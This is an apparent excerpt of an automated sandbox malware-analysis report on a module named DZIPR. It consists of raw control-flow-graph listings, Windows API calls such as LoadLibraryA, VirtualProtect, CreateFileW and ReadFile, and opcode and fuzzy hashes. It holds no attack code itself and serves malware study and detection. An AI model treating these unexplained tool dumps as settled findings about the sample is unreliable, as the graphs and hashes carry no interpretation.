__cftof2_l 67 API calls 16703->16706 16705->16668 16708 6c52f8c1 16706->16708 16707 6c52f8fc 16710 6c52f909 16707->16710 16711 6c52f91f 16707->16711 16709 6c52815c __cftof2_l 6 API calls 16708->16709 16709->16705 16768 6c52f145 16710->16768 16713 6c525348 __cftof2_l 67 API calls 16711->16713 16715 6c52f924 16713->16715 16714 6c52f917 16827 6c52f94a 16714->16827 16716 6c52535b __dosmaperr 67 API calls 16715->16716 16716->16714 16719 6c52f038 ___lock_fhandle 16718->16719 16720 6c52f065 16719->16720 16721 6c52f049 16719->16721 16723 6c52f073 16720->16723 16725 6c52f094 16720->16725 16722 6c52535b __dosmaperr 67 API calls 16721->16722 16724 6c52f04e 16722->16724 16726 6c52535b __dosmaperr 67 API calls 16723->16726 16730 6c525348 __cftof2_l 67 API calls 16724->16730 16728 6c52f0b4 16725->16728 16729 6c52f0da 16725->16729 16727 6c52f078 16726->16727 16731 6c525348 __cftof2_l 67 API calls 16727->16731 16732 6c52535b __dosmaperr 67 API calls 16728->16732 16734 6c5319c1 ___lock_fhandle 68 API calls 16729->16734 16733 6c52f056 ___lock_fhandle 16730->16733 16735 6c52f07f 16731->16735 16736 6c52f0b9 16732->16736 16733->16668 16737 6c52f0e0 16734->16737 16740 6c52815c __cftof2_l 6 API calls 16735->16740 16741 6c525348 __cftof2_l 67 API calls 16736->16741 16738 6c52f109 16737->16738 16739 6c52f0ed 16737->16739 16743 6c525348 __cftof2_l 67 API calls 16738->16743 16742 6c52efa7 __lseeki64_nolock 69 API calls 16739->16742 16740->16733 16744 6c52f0c0 16741->16744 16745 6c52f0fe 16742->16745 16746 6c52f10e 16743->16746 16747 6c52815c __cftof2_l 6 API calls 16744->16747 16879 6c52f13b 16745->16879 16748 6c52535b __dosmaperr 67 API calls 16746->16748 16747->16733 16748->16745 16754 6c52a5cc 16750->16754 16751 6c5249fe _malloc 66 API calls 16751->16754 16752 6c52a602 16752->16674 16753 6c52a5e3 Sleep 16753->16754 16754->16751 16754->16752 16754->16753 16756 6c52a206 __getptd_noexit 67 API calls 16755->16756 16757 6c525360 16756->16757 16757->16702 16759 6c5319cd ___lock_fhandle 16758->16759 16760 6c531a28 16759->16760 16763 6c52a914 __lock 67 API calls 16759->16763 16761 6c531a4a ___lock_fhandle 16760->16761 16762 6c531a2d RtlEnterCriticalSection 16760->16762 16761->16707 16762->16761 16764 6c5319f9 16763->16764 16765 6c531a10 16764->16765 16830 6c52e1d3 16764->16830 16834 6c531a58 16765->16834 16769 6c52f154 __write_nolock 16768->16769 16770 6c52f186 16769->16770 16771 6c52f1ad 16769->16771 16800 6c52f17b 16769->16800 16773 6c52535b __dosmaperr 67 API calls 16770->16773 16774 6c52f215 16771->16774 16775 6c52f1ef 16771->16775 16772 6c523f34 _$I10_OUTPUT 5 API calls 16776 6c52f876 16772->16776 16777 6c52f18b 16773->16777 16779 6c52f229 16774->16779 16839 6c52efa7 16774->16839 16778 6c52535b __dosmaperr 67 API calls 16775->16778 16776->16714 16780 6c525348 __cftof2_l 67 API calls 16777->16780 16783 6c52f1f4 16778->16783 16782 6c52f99d __flsbuf 67 API calls 16779->16782 16781 6c52f192 16780->16781 16785 6c52815c __cftof2_l 6 API calls 16781->16785 16786 6c52f234 16782->16786 16787 6c525348 __cftof2_l 67 API calls 16783->16787 16785->16800 16788 6c52f4da 16786->16788 16849 6c52a27f 16786->16849 16789 6c52f1fd 16787->16789 16791 6c52f4ea 16788->16791 16792 6c52f7a9 WriteFile 16788->16792 16790 6c52815c __cftof2_l 6 API calls 16789->16790 16790->16800 16794 6c52f5c8 16791->16794 16816 6c52f4fe 16791->16816 16796 6c52f4bc 16792->16796 16797 6c52f7dc GetLastError 16792->16797 16814 6c52f6a8 16794->16814 16820 6c52f5d7 16794->16820 16798 6c52f827 16796->16798 16796->16800 16802 6c52f7fa 16796->16802 16797->16796 16798->16800 16803 6c525348 __cftof2_l 67 API calls 16798->16803 16799 6c52f27a 16799->16788 16801 6c52f28c GetConsoleCP 16799->16801 16800->16772 16801->16796 16824 6c52f2af 16801->16824 16806 6c52f805 16802->16806 16807 6c52f819 16802->16807 16804 6c52f84a 16803->16804 16809 6c52535b __dosmaperr 67 API calls 16804->16809 16805 6c52f70e WideCharToMultiByte 16805->16797 16811 6c52f745 WriteFile 16805->16811 16810 6c525348 __cftof2_l 67 API calls 16806->16810 16857 6c52536e 16807->16857 16808 6c52f56c WriteFile 16808->16797 16808->16816 16809->16800 16817 6c52f80a 16810->16817 16811->16814 16815 6c52f77c GetLastError 16811->16815 16812 6c52f64c WriteFile 16812->16797 16812->16820 16814->16796 16814->16798 16814->16805 16814->16811 16815->16814 16816->16796 16816->16798 16816->16808 16819 6c52535b __dosmaperr 67 API calls 16817->16819 16819->16800 16820->16796 16820->16798 16820->16812 16821 6c530932 79 API calls __fassign 16821->16824 16822 6c52f35b WideCharToMultiByte 16822->16796 16823 6c52f38c WriteFile 16822->16823 16823->16797 16823->16824 16824->16796 16824->16797 16824->16821 16824->16822 16825 6c531a88 11 API calls __putwch_nolock 16824->16825 16826 6c52f3e0 WriteFile 16824->16826 16854 6c530984 16824->16854 16825->16824 16826->16797 16826->16824 16878 6c531a61 RtlLeaveCriticalSection 16827->16878 16829 6c52f952 16829->16705 16837 6c5253bc 16830->16837 16832 6c52e1df InitializeCriticalSectionAndSpinCount 16833 6c52e223 ___lock_fhandle 16832->16833 16833->16765 16838 6c52a83a RtlLeaveCriticalSection 16834->16838 16836 6c531a5f 16836->16760 16837->16832 16838->16836 16862 6c53194a 16839->16862 16841 6c52efc5 16842 6c52efde SetFilePointer 16841->16842 16843 6c52efcd 16841->16843 16844 6c52eff6 GetLastError 16842->16844 16847 6c52efd2 16842->16847 16845 6c525348 __cftof2_l 67 API calls 16843->16845 16846 6c52f000 16844->16846 16844->16847 16845->16847 16848 6c52536e __dosmaperr 67 API calls 16846->16848 16847->16779 16848->16847 16850 6c52a206 __getptd_noexit 67 API calls 16849->16850 16851 6c52a287 16850->16851 16852 6c525bff __amsg_exit 67 API calls 16851->16852 16853 6c52a294 GetConsoleMode 16851->16853 16852->16853 16853->16788 16853->16799 16875 6c53094c 16854->16875 16858 6c52535b __dosmaperr 67 API calls 16857->16858 16859 6c525379 __dosmaperr 16858->16859 16860 6c525348 __cftof2_l 67 API calls 16859->16860 16861 6c52538c 16860->16861 16861->16800 16863 6c531957 16862->16863 16864 6c53196f 16862->16864 16865 6c52535b __dosmaperr 67 API calls 16863->16865 16866 6c52535b __dosmaperr 67 API calls 16864->16866 16869 6c5319b4 16864->16869 16867 6c53195c 16865->16867 16870 6c53199d 16866->16870 16868 6c525348 __cftof2_l 67 API calls 16867->16868 16871 6c531964 16868->16871 16869->16841 16872 6c525348 __cftof2_l 67 API calls 16870->16872 16871->16841 16873 6c5319a4 16872->16873 16874 6c52815c __cftof2_l 6 API calls 16873->16874 16874->16869 16876 6c528659 _LocaleUpdate::_LocaleUpdate 77 API calls 16875->16876 16877 6c53095f 16876->16877 16877->16824 16878->16829 16882 6c531a61 RtlLeaveCriticalSection 16879->16882 16881 6c52f143 16881->16733 16882->16881 16885 6c517352 __EH_prolog3_catch_GS 16883->16885 16884 6c517381 ctype 16889 6c5251c4 16884->16889 16885->16884 16886 6c517202 ctype 72 API calls 16885->16886 16886->16884 16890 6c523f34 _$I10_OUTPUT 5 API calls 16889->16890 16891 6c5251ce 16890->16891 16891->16891

                                          Executed Functions

                                          Function 6C5163F0 Relevance: 4.7, APIs: 3, Instructions: 239memorylibraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 25 6c5163f0-6c5163f8 26 6c51649c-6c5164c1 25->26 27 6c5163fe-6c51640f 25->27 28 6c5164c3 26->28 29 6c516524 26->29 30 6c516413-6c51641e 27->30 32 6c5164c5-6c5164cb 28->32 31 6c516526-6c516551 29->31 33 6c516481 30->33 34 6c516420 30->34 36 6c5165f1 31->36 37 6c516557-6c516568 31->37 32->32 38 6c5164cd-6c5164cf 32->38 35 6c516483-6c516487 33->35 39 6c516422-6c516427 34->39 41 6c51671b-6c51671e 35->41 42 6c51648d-6c516492 35->42 43 6c5165f3-6c516661 LoadLibraryA VirtualProtect call 6c5167f8 VirtualProtect 36->43 44 6c51656c-6c516577 37->44 38->29 45 6c5164d1-6c5164d7 38->45 39->39 40 6c516429-6c51642b 39->40 40->33 46 6c51642d-6c516433 40->46 42->30 47 6c516498 42->47 63 6c516663 43->63 64 6c516682-6c5166a9 43->64 49 6c516579 44->49 50 6c5165da 44->50 51 6c5166f0 45->51 52 6c5164dd-6c5164e6 45->52 54 6c5166e6 46->54 55 6c516439-6c516443 46->55 47->26 57 6c51657b-6c516580 49->57 58 6c5165dc-6c5165e0 50->58 53 6c5164ea-6c516501 52->53 53->53 62 6c516503-6c516513 53->62 69 6c5166fa 54->69 59 6c516447-6c51645e 55->59 57->57 65 6c516582-6c516584 57->65 60 6c516704-6c516716 58->60 61 6c5165e6-6c5165eb 58->61 59->59 67 6c516460-6c516471 59->67 60->43 61->36 61->44 62->31 68 6c516515-6c516522 62->68 70 6c516667-6c516680 63->70 65->50 66 6c516586-6c51658c 65->66 66->69 71 6c516592-6c51659c 66->71 67->35 72 6c516473-6c51647f 67->72 68->31 69->60 70->64 70->70 74 6c5165a0-6c5165b7 71->74 72->35 74->74 75 6c5165b9-6c5165ca 74->75 75->58 76 6c5165cc-6c5165d8 75->76 76->58
                                          APIs
                                          • LoadLibraryA.KERNELBASE(00000000), ref: 6C516602
                                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6C51663B
                                          • VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6C516654
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$LibraryLoad
                                          • String ID:
                                          • API String ID: 895956442-0
                                          • Opcode ID: 32b8aaeac30b886dd618d1efe31e918a929052ed8f547cd527c8e1cc4c5968e2
                                          • Instruction ID: 22a772c01d15d2c4678175cf8e64963c3d773fefe8f9a7c3672c28ee511ae234
                                          • Opcode Fuzzy Hash: 32b8aaeac30b886dd618d1efe31e918a929052ed8f547cd527c8e1cc4c5968e2
                                          • Instruction Fuzzy Hash: F4A1DF3060C3568FD315CF19C88062AFBE6FFC9308F0A896DE89597606DB70E955CB85
                                          Function 6C515CA0 Relevance: 3.4, APIs: 2, Instructions: 353COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 105 6c515ca0-6c515d95 call 6c51af9c * 2 call 6c51afc3 * 2 call 6c5164e0 GetPEB 116 6c515de4 105->116 117 6c515d97 105->117 119 6c515de6-6c515e1d 116->119 118 6c515d99-6c515da3 117->118 120 6c515da5-6c515dab 118->120 121 6c515dd6-6c515dd8 118->121 122 6c515e23-6c515e3c 119->122 123 6c515eba-6c515f0c GlobalAlloc 119->123 124 6c515dae-6c515db5 120->124 127 6c5167e1-6c5167e4 121->127 128 6c515dde-6c515de2 121->128 129 6c515e40-6c515e4e 122->129 125 6c515f12-6c515f2b 123->125 126 6c515fad 123->126 131 6c515dc1-6c515dcd 124->131 132 6c515db7-6c515dbd 124->132 133 6c515f2f-6c515f3d 125->133 130 6c515faf-6c515fce 126->130 127->119 128->116 128->118 134 6c515e50 129->134 135 6c515ea3 129->135 151 6c515fd0 130->151 152 6c515fe7-6c515fea 130->152 131->124 140 6c515dcf-6c515dd3 131->140 132->131 137 6c515dbf 132->137 138 6c515f92 133->138 139 6c515f3f 133->139 136 6c515e52-6c515e58 134->136 141 6c515ea5-6c515ea9 135->141 136->136 142 6c515e5a-6c515e5c 136->142 137->131 145 6c515f94-6c515f98 138->145 144 6c515f41-6c515f47 139->144 140->121 146 6c5167c3-6c5167d8 141->146 147 6c515eaf-6c515eb4 141->147 142->135 150 6c515e5e-6c515e64 142->150 144->144 153 6c515f49-6c515f4b 144->153 148 6c5167a5-6c5167be 145->148 149 6c515f9e-6c515fa3 145->149 147->129 155 6c515eb6 147->155 148->130 149->133 156 6c515fa5-6c515fa9 149->156 157 6c5166aa-6c5166af 150->157 158 6c515e6a-6c515e6e 150->158 159 6c515fd2-6c515fe5 151->159 160 6c515fec 152->160 161 6c515ffe-6c516038 152->161 153->138 162 6c515f4d-6c515f53 153->162 155->123 156->126 157->141 169 6c515e97-6c515ea1 157->169 158->123 159->152 159->159 164 6c515fee-6c515ffc 160->164 167 6c5160d9 161->167 168 6c51603e-6c516057 161->168 165 6c5166b4 162->165 166 6c515f59-6c515f5d 162->166 164->161 164->164 173 6c5166be 165->173 171 6c515f5f-6c515f75 166->171 170 6c5160db-6c516139 CreateFileW 167->170 172 6c51605b-6c516069 168->172 169->141 178 6c51613f-6c51615c 170->178 179 6c5161de-6c516780 170->179 171->171 175 6c515f77-6c515f84 171->175 176 6c51606b 172->176 177 6c5160be 172->177 184 6c516788-6c5167a0 173->184 175->145 181 6c515f86-6c515f90 175->181 182 6c51606d-6c516073 176->182 180 6c5160c0-6c5160c4 177->180 178->127 180->184 185 6c5160ca-6c5160cf 180->185 181->145 182->182 183 6c516075-6c516077 182->183 183->177 187 6c516079-6c51607f 183->187 184->170 185->172 188 6c5160d1-6c5160d5 185->188 187->173 190 6c516085-6c516089 187->190 188->167 192 6c51608b-6c5160a1 190->192 192->192 194 6c5160a3-6c5160b0 192->194 194->180 195 6c5160b2-6c5160bc 194->195 195->180
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: LibraryLoad_memset
                                          • String ID:
                                          • API String ID: 2997193564-0
                                          • Opcode ID: 952a71da1f6bebfb869aa9724ff1307be6434ec4773455e8003447b7dfff7424
                                          • Instruction ID: 0f825b312085755f204ca0af5e452b2442b997eff4a683ed8d5a0d0f726aa858
                                          • Opcode Fuzzy Hash: 952a71da1f6bebfb869aa9724ff1307be6434ec4773455e8003447b7dfff7424
                                          • Instruction Fuzzy Hash: B2E18BB0A087068FD714DF1AC89462AFBF5FF88308F55892DE89987B11DB30E955CB85
                                          Function 6C515E70 Relevance: 1.5, APIs: 1, Instructions: 248memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 332 6c515e70-6c515e86 332->332 333 6c515e88-6c515e8c 332->333 334 6c515e90-6c515e95 333->334 335 6c515ea5-6c515ea9 334->335 336 6c515e97-6c515ea1 334->336 337 6c5167c3-6c5167d8 335->337 338 6c515eaf-6c515eb4 335->338 336->335 340 6c515e40-6c515e4e 338->340 341 6c515eb6 338->341 343 6c515e50 340->343 344 6c515ea3 340->344 342 6c515eba-6c515f0c GlobalAlloc 341->342 346 6c515f12-6c515f2b 342->346 347 6c515fad 342->347 345 6c515e52-6c515e58 343->345 344->335 345->345 348 6c515e5a-6c515e5c 345->348 350 6c515f2f-6c515f3d 346->350 349 6c515faf-6c515fce 347->349 348->344 351 6c515e5e-6c515e64 348->351 361 6c515fd0 349->361 362 6c515fe7-6c515fea 349->362 352 6c515f92 350->352 353 6c515f3f 350->353 354 6c5166aa-6c5166af 351->354 355 6c515e6a-6c515e6e 351->355 358 6c515f94-6c515f98 352->358 357 6c515f41-6c515f47 353->357 354->334 355->342 357->357 363 6c515f49-6c515f4b 357->363 359 6c5167a5-6c5167be 358->359 360 6c515f9e-6c515fa3 358->360 359->349 360->350 364 6c515fa5-6c515fa9 360->364 365 6c515fd2-6c515fe5 361->365 366 6c515fec 362->366 367 6c515ffe-6c516038 362->367 363->352 368 6c515f4d-6c515f53 363->368 364->347 365->362 365->365 369 6c515fee-6c515ffc 366->369 372 6c5160d9 367->372 373 6c51603e-6c516057 367->373 370 6c5166b4 368->370 371 6c515f59-6c515f5d 368->371 369->367 369->369 377 6c5166be 370->377 375 6c515f5f-6c515f75 371->375 374 6c5160db-6c516139 CreateFileW 372->374 376 6c51605b-6c516069 373->376 382 6c51613f-6c5167e4 374->382 383 6c5161de-6c516780 374->383 375->375 379 6c515f77-6c515f84 375->379 380 6c51606b 376->380 381 6c5160be 376->381 388 6c516788-6c5167a0 377->388 379->358 385 6c515f86-6c515f90 379->385 386 6c51606d-6c516073 380->386 384 6c5160c0-6c5160c4 381->384 382->342 400 6c515e23-6c515e3c 382->400 384->388 389 6c5160ca-6c5160cf 384->389 385->358 386->386 387 6c516075-6c516077 386->387 387->381 391 6c516079-6c51607f 387->391 388->374 389->376 392 6c5160d1-6c5160d5 389->392 391->377 395 6c516085-6c516089 391->395 392->372 398 6c51608b-6c5160a1 395->398 398->398 401 6c5160a3-6c5160b0 398->401 400->340 401->384 402 6c5160b2-6c5160bc 401->402 402->384
                                          APIs
                                          • GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6C515ECA
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AllocGlobal
                                          • String ID:
                                          • API String ID: 3761449716-0
                                          • Opcode ID: a4a5709c9655045efaa4e4b912102b50090d554d3e30dadca7cedaaf9164bb4a
                                          • Instruction ID: a2cc0c8648c4cb1a74a4c2939a1b5652b01fa05ac37c0862bebf5fd43b341ec7
                                          • Opcode Fuzzy Hash: a4a5709c9655045efaa4e4b912102b50090d554d3e30dadca7cedaaf9164bb4a
                                          • Instruction Fuzzy Hash: 32A1B17060C3068FD708DF28C89422AB7E2FF89308F55896DE89687B56D730E861CB81
                                          Function 6C51BC4E Relevance: 16.6, APIs: 11, Instructions: 106memoryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(6C5432EC), ref: 6C51BC61
                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,6C5432D0,6C5432D0,?,6C51C0A4,00000004,6C51AF00,6C516DDD,6C5168AD,?,6C524902,?), ref: 6C51BCB7
                                          • GlobalHandle.KERNEL32(00FBB080), ref: 6C51BCC0
                                          • GlobalUnlock.KERNEL32(00000000), ref: 6C51BCCA
                                          • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 6C51BCE3
                                          • GlobalHandle.KERNEL32(00FBB080), ref: 6C51BCF5
                                          • GlobalLock.KERNEL32(00000000), ref: 6C51BCFC
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C51BD05
                                          • GlobalLock.KERNEL32(00000000), ref: 6C51BD11
                                          • _memset.LIBCMT ref: 6C51BD2B
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C51BD59
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                          • String ID:
                                          • API String ID: 496899490-0
                                          • Opcode ID: f23622fa3079a2f2a1cff776b9965325b6a06531fbfba603b079b4229947a467
                                          • Instruction ID: e7dc77d7a79ac74e43806f5a4c2bd8df767f3654c0114ebe1df0b958ab7a5870
                                          • Opcode Fuzzy Hash: f23622fa3079a2f2a1cff776b9965325b6a06531fbfba603b079b4229947a467
                                          • Instruction Fuzzy Hash: 6131EFB1604701EFEB249F64CC8DA5A7BF9FF84304B05496AE556C7F00EB70E8448B94
                                          Function 6C5164E0 Relevance: 4.7, APIs: 3, Instructions: 151librarymemoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 77 6c5164e0-6c5164e8 78 6c5164ea-6c516501 77->78 78->78 79 6c516503-6c516513 78->79 80 6c516515-6c516522 79->80 81 6c516526-6c516551 79->81 80->81 82 6c5165f1 81->82 83 6c516557-6c516568 81->83 84 6c5165f3-6c516661 LoadLibraryA VirtualProtect call 6c5167f8 VirtualProtect 82->84 85 6c51656c-6c516577 83->85 94 6c516663 84->94 95 6c516682-6c5166a9 84->95 87 6c516579 85->87 88 6c5165da 85->88 90 6c51657b-6c516580 87->90 91 6c5165dc-6c5165e0 88->91 90->90 96 6c516582-6c516584 90->96 92 6c516704-6c516716 91->92 93 6c5165e6-6c5165eb 91->93 92->84 93->82 93->85 98 6c516667-6c516680 94->98 96->88 97 6c516586-6c51658c 96->97 99 6c516592-6c51659c 97->99 100 6c5166fa 97->100 98->95 98->98 102 6c5165a0-6c5165b7 99->102 100->92 102->102 103 6c5165b9-6c5165ca 102->103 103->91 104 6c5165cc-6c5165d8 103->104 104->91
                                          APIs
                                          • LoadLibraryA.KERNELBASE(00000000), ref: 6C516602
                                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6C51663B
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: LibraryLoadProtectVirtual
                                          • String ID:
                                          • API String ID: 3279857687-0
                                          • Opcode ID: 8d1c55a613902544d25a038340f4e633b3ba2d15ec23633fd952aa9acfe89f1e
                                          • Instruction ID: 2dc96c165b40467e619bf7679e74a4baface29b3869f308371fc06285ca641de
                                          • Opcode Fuzzy Hash: 8d1c55a613902544d25a038340f4e633b3ba2d15ec23633fd952aa9acfe89f1e
                                          • Instruction Fuzzy Hash: 2751D03060C3558FD715CF18C88062AFBE6EFC9308F1A896DE88587616DA30E946CB95
                                          Function 6C516750 Relevance: 1.6, APIs: 1, Instructions: 109fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 197 6c516750-6c516762 ReadFile 199 6c5161f0-6c516207 197->199 200 6c51630a-6c516323 197->200 201 6c516325-6c516329 200->201 202 6c51634d-6c516368 200->202 204 6c516738 201->204 205 6c51632f 201->205 206 6c5163cb 202->206 207 6c51636a 202->207 204->197 209 6c516331-6c51633c 205->209 208 6c5163cd-6c5163ee 206->208 210 6c51636c-6c516372 207->210 211 6c5166dc 208->211 209->209 212 6c51633e-6c516347 209->212 210->210 213 6c516374-6c516376 210->213 211->204 212->202 214 6c516349 212->214 213->206 215 6c516378-6c51637e 213->215 214->202 215->211 216 6c516384-6c51638d 215->216 217 6c516391-6c5163a8 216->217 217->217 218 6c5163aa-6c5163ba 217->218 218->208 219 6c5163bc-6c5163c9 218->219 219->208
                                          APIs
                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6C53C168), ref: 6C516300
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 5be2214db39aeb1c5b0cb0ce8808323df14b9001f0a1adce16f3b801de6712fb
                                          • Instruction ID: 06bb4ec56e3c2f4679b3f3ef4ae770b1f5f09429bc4f3f805d4c83e49c214a0e
                                          • Opcode Fuzzy Hash: 5be2214db39aeb1c5b0cb0ce8808323df14b9001f0a1adce16f3b801de6712fb
                                          • Instruction Fuzzy Hash: 4941CF3160C7458FE708CF19CC9866AB7E2FBC4318F19C96DE88987B16DA31E8558B80
                                          Function 6C5162D0 Relevance: 1.6, APIs: 1, Instructions: 97fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 220 6c5162d0-6c5162d5 221 6c516742-6c51674e 220->221 222 6c5162db-6c5162e0 220->222 223 6c5162e2-6c5162f1 222->223 224 6c51626d-6c51627b 222->224 230 6c5166d2 223->230 225 6c51627d 224->225 226 6c5162cf 224->226 228 6c51627f-6c516284 225->228 229 6c5162d1-6c5162d5 226->229 228->228 231 6c516286-6c516288 228->231 229->221 229->222 230->221 231->226 232 6c51628a-6c516290 231->232 232->230 233 6c516296-6c51629a 232->233 234 6c51629c-6c5162b2 233->234 234->234 235 6c5162b4-6c5162c1 234->235 235->229 236 6c5162c3-6c5162cd 235->236 236->229
                                          APIs
                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6C53C168), ref: 6C516300
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2399567165.000000006C511000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C510000, based on PE: true
                                          • Associated: 00000012.00000002.2399519240.000000006C510000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C541000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000012.00000002.2402401413.000000006C545000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6c510000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 2c82f8ba8fb648fc44881433e7a830a24dc66878116422a9f94d92a3e2be3af5
                                          • Instruction ID: 27cbcc40b06836ee1fe37b93d85e232735b23634e27611021d305dad54894460
                                          • Opcode Fuzzy Hash: 2c82f8ba8fb648fc44881433e7a830a24dc66878116422a9f94d92a3e2be3af5
                                          • Instruction Fuzzy Hash: 4731EE31A0C7458FD708CF08C88866AB7E2EFC4318F19C96CE88597B16EA30F855CB81
                                          Function 6C51C050 Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 237 6c51c050-6c51c068 call 6c5250c9 240 6c51c06a call 6c516dc1 237->240 241 6c51c06f-6c51c072 237->241 240->241 243 6c51c074-6c51c07c 241->243 244 6c51c0aa-6c51c0bb call 6c51ba5b 241->244 246 6c51c09f call 6c51bc4e 243->246 247 6c51c07e-6c51c09d call 6c51bd66 243->247 251 6c51c0d0-6c51c0d7 call 6c5251a1 244->251 252 6c51c0bd-6c51c0cb call 6c51be0d 244->252 254 6c51c0a4-6c51c0a8 246->254 247->240 247->246 252->251 254->240 254->244
                                          APIs
